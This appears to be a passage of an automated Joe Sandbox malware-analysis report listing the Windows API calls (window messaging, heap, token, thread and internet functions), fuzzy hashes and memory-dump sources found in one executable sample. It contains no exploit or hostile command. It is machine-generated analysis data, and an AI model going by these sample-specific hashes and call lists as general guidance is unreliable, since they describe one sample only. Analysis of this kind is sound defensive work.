                                                      • GetCursorPos.USER32(?), ref: 00EC9001
                                                      • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00E87711,?,?,?,?,?), ref: 00EC9016
                                                      • GetCursorPos.USER32(?), ref: 00EC905E
                                                      • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00E87711,?,?,?), ref: 00EC9094
                                                      Similarity
                                                      • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                      • String ID:
                                                      • API String ID: 2864067406-0
                                                      APIs
                                                      • GetFileAttributesW.KERNEL32(?,00ECCB68), ref: 00E9D2FB
                                                      • GetLastError.KERNEL32 ref: 00E9D30A
                                                      • CreateDirectoryW.KERNEL32(?,00000000), ref: 00E9D319
                                                      • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,00ECCB68), ref: 00E9D376
                                                      Similarity
                                                      • API ID: CreateDirectory$AttributesErrorFileLast
                                                      • String ID:
                                                      • API String ID: 2267087916-0
                                                      APIs
                                                        • Part of subcall function 00E91014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00E9102A
                                                        • Part of subcall function 00E91014: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00E91036
                                                        • Part of subcall function 00E91014: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00E91045
                                                        • Part of subcall function 00E91014: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00E9104C
                                                        • Part of subcall function 00E91014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00E91062
                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00E915BE
                                                      • _memcmp.LIBVCRUNTIME ref: 00E915E1
                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00E91617
                                                      • HeapFree.KERNEL32(00000000), ref: 00E9161E
                                                      Similarity
                                                      • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                                      • String ID:
                                                      • API String ID: 1592001646-0
                                                      APIs
                                                      • GetWindowLongW.USER32(?,000000EC), ref: 00EC280A
                                                      • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00EC2824
                                                      • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00EC2832
                                                      • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00EC2840
                                                      Similarity
                                                      • API ID: Window$Long$AttributesLayered
                                                      • String ID:
                                                      • API String ID: 2169480361-0
                                                      APIs
                                                        • Part of subcall function 00E98D7D: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,00E9790A,?,000000FF,?,00E98754,00000000,?,0000001C,?,?), ref: 00E98D8C
                                                        • Part of subcall function 00E98D7D: lstrcpyW.KERNEL32(00000000,?,?,00E9790A,?,000000FF,?,00E98754,00000000,?,0000001C,?,?,00000000), ref: 00E98DB2
                                                        • Part of subcall function 00E98D7D: lstrcmpiW.KERNEL32(00000000,?,00E9790A,?,000000FF,?,00E98754,00000000,?,0000001C,?,?), ref: 00E98DE3
                                                      • lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,00E98754,00000000,?,0000001C,?,?,00000000), ref: 00E97923
                                                      • lstrcpyW.KERNEL32(00000000,?,?,00E98754,00000000,?,0000001C,?,?,00000000), ref: 00E97949
                                                      • lstrcmpiW.KERNEL32(00000002,cdecl,?,00E98754,00000000,?,0000001C,?,?,00000000), ref: 00E97984
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                       • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: lstrcmpilstrcpylstrlen
                                                      • String ID: cdecl
                                                      • API String ID: 4031866154-3896280584
                                                      APIs
                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00EC7D0B
                                                      • SetWindowLongW.USER32(00000000,000000F0,?), ref: 00EC7D2A
                                                      • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00EC7D42
                                                      • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00EAB7AD,00000000), ref: 00EC7D6B
                                                        • Part of subcall function 00E49BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00E49BB2
                                                      Similarity
                                                      • API ID: Window$Long
                                                      • String ID:
                                                      • API String ID: 847901565-0
                                                      APIs
                                                      • SendMessageW.USER32(?,00001060,?,00000004), ref: 00EC56BB
                                                      • _wcslen.LIBCMT ref: 00EC56CD
                                                      • _wcslen.LIBCMT ref: 00EC56D8
                                                      • SendMessageW.USER32(?,00001002,00000000,?), ref: 00EC5816
                                                      Similarity
                                                      • API ID: MessageSend_wcslen
                                                      • String ID:
                                                      • API String ID: 455545452-0
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      APIs
                                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 00E91A47
                                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00E91A59
                                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00E91A6F
                                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00E91A8A
                                                      Similarity
                                                      • API ID: MessageSend
                                                      • String ID:
                                                      • API String ID: 3850602802-0
                                                      APIs
                                                      • GetCurrentThreadId.KERNEL32 ref: 00E9E1FD
                                                      • MessageBoxW.USER32(?,?,?,?), ref: 00E9E230
                                                      • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00E9E246
                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00E9E24D
                                                      Similarity
                                                      • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                      • String ID:
                                                      • API String ID: 2880819207-0
                                                      APIs
                                                      • CreateThread.KERNEL32(00000000,?,00E5CFF9,00000000,00000004,00000000), ref: 00E5D218
                                                      • GetLastError.KERNEL32 ref: 00E5D224
                                                      • __dosmaperr.LIBCMT ref: 00E5D22B
                                                      • ResumeThread.KERNEL32(00000000), ref: 00E5D249
                                                      Similarity
                                                      • API ID: Thread$CreateErrorLastResume__dosmaperr
                                                      • String ID:
                                                      • API String ID: 173952441-0
                                                      APIs
                                                      • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00E3604C
                                                      • GetStockObject.GDI32(00000011), ref: 00E36060
                                                      • SendMessageW.USER32(00000000,00000030,00000000), ref: 00E3606A
                                                      Similarity
                                                      • API ID: CreateMessageObjectSendStockWindow
                                                      • String ID:
                                                      • API String ID: 3970641297-0
                                                      APIs
                                                      • ___BuildCatchObject.LIBVCRUNTIME ref: 00E53B56
                                                        • Part of subcall function 00E53AA3: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 00E53AD2
                                                        • Part of subcall function 00E53AA3: ___AdjustPointer.LIBCMT ref: 00E53AED
                                                      • _UnwindNestedFrames.LIBCMT ref: 00E53B6B
                                                      • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00E53B7C
                                                      • CallCatchBlock.LIBVCRUNTIME ref: 00E53BA4
                                                      Similarity
                                                      • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                                      • String ID:
                                                      • API String ID: 737400349-0
                                                      APIs
                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00E313C6,00000000,00000000,?,00E6301A,00E313C6,00000000,00000000,00000000,?,00E6328B,00000006,FlsSetValue), ref: 00E630A5
                                                      • GetLastError.KERNEL32(?,00E6301A,00E313C6,00000000,00000000,00000000,?,00E6328B,00000006,FlsSetValue,00ED2290,FlsSetValue,00000000,00000364,?,00E62E46), ref: 00E630B1
                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00E6301A,00E313C6,00000000,00000000,00000000,?,00E6328B,00000006,FlsSetValue,00ED2290,FlsSetValue,00000000), ref: 00E630BF
                                                      Similarity
                                                      • API ID: LibraryLoad$ErrorLast
                                                      • String ID:
                                                      • API String ID: 3177248105-0
                                                      APIs
                                                      • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000), ref: 00E9747F
                                                      • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00E97497
                                                      • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 00E974AC
                                                      • RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 00E974CA
                                                      Similarity
                                                      • API ID: Type$Register$FileLoadModuleNameUser
                                                      • String ID:
                                                      • API String ID: 1352324309-0
                                                      APIs
                                                      • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,00E9ACD3,?,00008000), ref: 00E9B0C4
                                                      • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,00E9ACD3,?,00008000), ref: 00E9B0E9
                                                      • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,00E9ACD3,?,00008000), ref: 00E9B0F3
                                                      • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,00E9ACD3,?,00008000), ref: 00E9B126
                                                      Similarity
                                                      • API ID: CounterPerformanceQuerySleep
                                                      • String ID:
                                                      • API String ID: 2875609808-0
                                                      APIs
                                                      • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00E92DC5
                                                      • GetWindowThreadProcessId.USER32(?,00000000), ref: 00E92DD6
                                                      • GetCurrentThreadId.KERNEL32 ref: 00E92DDD
                                                      • AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00E92DE4
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                      • String ID:
                                                      • API String ID: 2710830443-0
                                                      APIs
                                                        • Part of subcall function 00E49639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00E49693
                                                        • Part of subcall function 00E49639: SelectObject.GDI32(?,00000000), ref: 00E496A2
                                                        • Part of subcall function 00E49639: BeginPath.GDI32(?), ref: 00E496B9
                                                        • Part of subcall function 00E49639: SelectObject.GDI32(?,00000000), ref: 00E496E2
                                                      • MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 00EC8887
                                                      • LineTo.GDI32(?,?,?), ref: 00EC8894
                                                      • EndPath.GDI32(?), ref: 00EC88A4
                                                      • StrokePath.GDI32(?), ref: 00EC88B2
                                                      Similarity
                                                      • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                      • String ID:
                                                      • API String ID: 1539411459-0
                                                      APIs
                                                      • GetSysColor.USER32(00000008), ref: 00E498CC
                                                      • SetTextColor.GDI32(?,?), ref: 00E498D6
                                                      • SetBkMode.GDI32(?,00000001), ref: 00E498E9
                                                      • GetStockObject.GDI32(00000005), ref: 00E498F1
                                                      Similarity
                                                      • API ID: Color$ModeObjectStockText
                                                      • String ID:
                                                      • API String ID: 4037423528-0
                                                      APIs
                                                      • GetCurrentThread.KERNEL32 ref: 00E91634
                                                      • OpenThreadToken.ADVAPI32(00000000,?,?,?,00E911D9), ref: 00E9163B
                                                      • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00E911D9), ref: 00E91648
                                                      • OpenProcessToken.ADVAPI32(00000000,?,?,?,00E911D9), ref: 00E9164F
                                                      Similarity
                                                      • API ID: CurrentOpenProcessThreadToken
                                                      • String ID:
                                                      • API String ID: 3974789173-0
                                                      APIs
                                                      • GetDesktopWindow.USER32 ref: 00E8D858
                                                      • GetDC.USER32(00000000), ref: 00E8D862
                                                      • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00E8D882
                                                      • ReleaseDC.USER32(?), ref: 00E8D8A3
                                                      Similarity
                                                      • API ID: CapsDesktopDeviceReleaseWindow
                                                      • String ID:
                                                      • API String ID: 2889604237-0
                                                      APIs
                                                      • GetDesktopWindow.USER32 ref: 00E8D86C
                                                      • GetDC.USER32(00000000), ref: 00E8D876
                                                      • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00E8D882
                                                      • ReleaseDC.USER32(?), ref: 00E8D8A3
                                                      Similarity
                                                      • API ID: CapsDesktopDeviceReleaseWindow
                                                      • String ID:
                                                      • API String ID: 2889604237-0
                                                      APIs
                                                        • Part of subcall function 00E37620: _wcslen.LIBCMT ref: 00E37625
                                                      • WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 00EA4ED4
                                                      Strings
                                                      Similarity
                                                      • API ID: Connection_wcslen
                                                      • String ID: *$LPT
                                                      • API String ID: 1725874428-3443410124
                                                      APIs
                                                      • CharUpperBuffW.USER32(00E8569E,00000000,?,00ECCC08,?,00000000,00000000), ref: 00EB78DD
                                                        • Part of subcall function 00E36B57: _wcslen.LIBCMT ref: 00E36B6A
                                                      • CharUpperBuffW.USER32(00E8569E,00000000,?,00ECCC08,00000000,?,00000000,00000000), ref: 00EB783B
                                                      Strings
                                                      Similarity
                                                      • API ID: BuffCharUpper$_wcslen
                                                      • String ID: <s
                                                      • API String ID: 3544283678-2940880691
                                                      Strings
                                                      Similarity
                                                      • API ID:
                                                      • String ID: #
                                                      • API String ID: 0-1885708031
                                                      APIs
                                                      • Sleep.KERNEL32(00000000), ref: 00E4F2A2
                                                      • GlobalMemoryStatusEx.KERNEL32(?), ref: 00E4F2BB
                                                      Strings
                                                      Similarity
                                                      • API ID: GlobalMemorySleepStatus
                                                      • String ID: @
                                                      • API String ID: 2783356886-2766056989
                                                      APIs
                                                      • CharUpperBuffW.USER32(?,?,?,00000003,?,?), ref: 00EB57E0
                                                      • _wcslen.LIBCMT ref: 00EB57EC
                                                      Strings
                                                      Similarity
                                                      • API ID: BuffCharUpper_wcslen
                                                      • String ID: CALLARGARRAY
                                                      • API String ID: 157775604-1150593374
                                                      APIs
                                                      • _wcslen.LIBCMT ref: 00EAD130
                                                      • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 00EAD13A
                                                      Strings
                                                      Similarity
                                                      • API ID: CrackInternet_wcslen
                                                      • String ID: |
                                                      • API String ID: 596671847-2343686810
                                                      APIs
                                                      • DestroyWindow.USER32(?,?,?,?), ref: 00EC3621
                                                      • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00EC365C
                                                      Strings
                                                      Similarity
                                                      • API ID: Window$DestroyMove
                                                      • String ID: static
                                                      • API String ID: 2139405536-2160076837
                                                      • Opcode ID: bb500713e74b4eb21d20d9f622ccd552b61f91061547eb02ad2e5f514f4fcc98
                                                      • Instruction ID: c72f5ec03566a0250589b92b43dc7083d8c8a9d7964f5a23b4c7b8d15a8e6d30
                                                      • Opcode Fuzzy Hash: bb500713e74b4eb21d20d9f622ccd552b61f91061547eb02ad2e5f514f4fcc98
                                                      • Instruction Fuzzy Hash: 6C317E71110204AADB24DF78D841FFB73A9FF48714F10A61DF965A7280DA32AD92DB60
                                                      APIs
                                                      • SendMessageW.USER32(?,00001132,00000000,?), ref: 00EC461F
                                                      • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00EC4634
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: MessageSend
                                                      • String ID: '
                                                      • API String ID: 3850602802-1997036262
                                                      • Opcode ID: 023acf1d8da5d628a9720a08b7684db7db1083621c4291dc2c6ea21c98d7d748
                                                      • Instruction ID: d4b7c57304c4bf1c24cf48ae52a29ca9e4c17838f90c25101738cc380e167d00
                                                      • Opcode Fuzzy Hash: 023acf1d8da5d628a9720a08b7684db7db1083621c4291dc2c6ea21c98d7d748
                                                      • Instruction Fuzzy Hash: 083128B5A002099FDB14CF69CA90FDA7BB5FF09304F14506AE904AB381D771A942CF90
                                                      APIs
                                                      • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00EC327C
                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00EC3287
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: MessageSend
                                                      • String ID: Combobox
                                                      • API String ID: 3850602802-2096851135
                                                      • Opcode ID: d8365d79c12931bbe8f07d46f2f83e815a707983b8f63088a35306a27e9f707a
                                                      • Instruction ID: 86d7f4c540ac9449d1b04ca6646b6a1c98f99779d3db50858ade29689f1ffc40
                                                      • Opcode Fuzzy Hash: d8365d79c12931bbe8f07d46f2f83e815a707983b8f63088a35306a27e9f707a
                                                      • Instruction Fuzzy Hash: A711E6713002087FEF299F64DD80FBB37ABEB54368F109128F518B72A0D6329D528760
                                                      APIs
                                                        • Part of subcall function 00E3600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00E3604C
                                                        • Part of subcall function 00E3600E: GetStockObject.GDI32(00000011), ref: 00E36060
                                                        • Part of subcall function 00E3600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 00E3606A
                                                      • GetWindowRect.USER32(00000000,?), ref: 00EC377A
                                                      • GetSysColor.USER32(00000012), ref: 00EC3794
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                      • String ID: static
                                                      • API String ID: 1983116058-2160076837
                                                      • Opcode ID: 51795df9eb34ce6d92d2bff03b1ef3535d732725c9e5dedd2595926db0537ca4
                                                      • Instruction ID: 7c9cb8b426250ea4b8c2f95c05211c8efcfdca6506f2d14a4a2aa2e3acc16f8b
                                                      • Opcode Fuzzy Hash: 51795df9eb34ce6d92d2bff03b1ef3535d732725c9e5dedd2595926db0537ca4
                                                      • Instruction Fuzzy Hash: 4C1159B2610209AFDF00DFB8CD4AEEA7BF8FB08314F005929F955E2250D736E8129B50
                                                      APIs
                                                      • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00EACD7D
                                                      • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00EACDA6
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: Internet$OpenOption
                                                      • String ID: <local>
                                                      • API String ID: 942729171-4266983199
                                                      • Opcode ID: 01b0524aef5b8358d1d6c30b9fad5c5d4a0d25862da57db8c9666d8431d8cdeb
                                                      • Instruction ID: 897f6feefc8fef0901e0c541c10cf798a75ed1969042068ffa969a45a698e02c
                                                      • Opcode Fuzzy Hash: 01b0524aef5b8358d1d6c30b9fad5c5d4a0d25862da57db8c9666d8431d8cdeb
                                                      • Instruction Fuzzy Hash: DE1106712016357AD7344B668C44EF3BE6CEF177A8F205236B109A7180D370A841D6F0
                                                      APIs
                                                      • GetWindowTextLengthW.USER32(00000000), ref: 00EC34AB
                                                      • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00EC34BA
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: LengthMessageSendTextWindow
                                                      • String ID: edit
                                                      • API String ID: 2978978980-2167791130
                                                      • Opcode ID: f636cabec5a53c5a2ed925953193762d266ee2dc940d76779fa03d2b5550818b
                                                      • Instruction ID: c9e35552bf4ea021d85c5e63ab991bf16786af5dc64ab0e4f1d4b275d32c3792
                                                      • Opcode Fuzzy Hash: f636cabec5a53c5a2ed925953193762d266ee2dc940d76779fa03d2b5550818b
                                                      • Instruction Fuzzy Hash: C2115B71100208AAEB254E74DE44FEA37AAFB05778F60A328F975A31D0C672DD529B50
                                                      APIs
                                                        • Part of subcall function 00E39CB3: _wcslen.LIBCMT ref: 00E39CBD
                                                      • CharUpperBuffW.USER32(?,?,?), ref: 00E96CB6
                                                      • _wcslen.LIBCMT ref: 00E96CC2
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: _wcslen$BuffCharUpper
                                                      • String ID: STOP
                                                      • API String ID: 1256254125-2411985666
                                                      • Opcode ID: e1465e2e53c446f5fadcf71948945eef435547966edda075c0d88ce0defe578b
                                                      • Instruction ID: cfe0e90be082e2a56da29d74806d7d3fa120380acd3a41d2719eee8710a3513f
                                                      • Opcode Fuzzy Hash: e1465e2e53c446f5fadcf71948945eef435547966edda075c0d88ce0defe578b
                                                      • Instruction Fuzzy Hash: D20108326005268ACF11AFBDDC419BF77F4EB60714B102936F862B2191EB31D840C650
                                                      APIs
                                                        • Part of subcall function 00E39CB3: _wcslen.LIBCMT ref: 00E39CBD
                                                        • Part of subcall function 00E93CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00E93CCA
                                                      • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00E91D4C
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: ClassMessageNameSend_wcslen
                                                      • String ID: ComboBox$ListBox
                                                      • API String ID: 624084870-1403004172
                                                      • Opcode ID: 39960adf25e064b1821d48b6de4fcca5f1062b5f89df1b95c6c6873265c7a149
                                                      • Instruction ID: 71b2bd23867135bdcfc13af0cb21866e2a3868583a5f7a1c8d5b8b0990c0b2c2
                                                      • Opcode Fuzzy Hash: 39960adf25e064b1821d48b6de4fcca5f1062b5f89df1b95c6c6873265c7a149
                                                      • Instruction Fuzzy Hash: 75012431600219AB8F08EBA0CC15CFEB7A8EF52390F102A19F822773C2EB705908C660
                                                      APIs
                                                        • Part of subcall function 00E39CB3: _wcslen.LIBCMT ref: 00E39CBD
                                                        • Part of subcall function 00E93CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00E93CCA
                                                      • SendMessageW.USER32(?,00000180,00000000,?), ref: 00E91C46
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: ClassMessageNameSend_wcslen
                                                      • String ID: ComboBox$ListBox
                                                      • API String ID: 624084870-1403004172
                                                      • Opcode ID: 3e79f4930ecb1634ab4639356beb59f8a0747cda4c7bc8c378e6fe6aad81857d
                                                      • Instruction ID: b8f57607c6bc06d810ac61e3e9ce9bebaa044fcb3115506dbf18fed90dfed8da
                                                      • Opcode Fuzzy Hash: 3e79f4930ecb1634ab4639356beb59f8a0747cda4c7bc8c378e6fe6aad81857d
                                                      • Instruction Fuzzy Hash: 3101F7716842097ACF08EBA0CA55EFFB7E89F51340F102019B90673282EA609E08C6B1
                                                      APIs
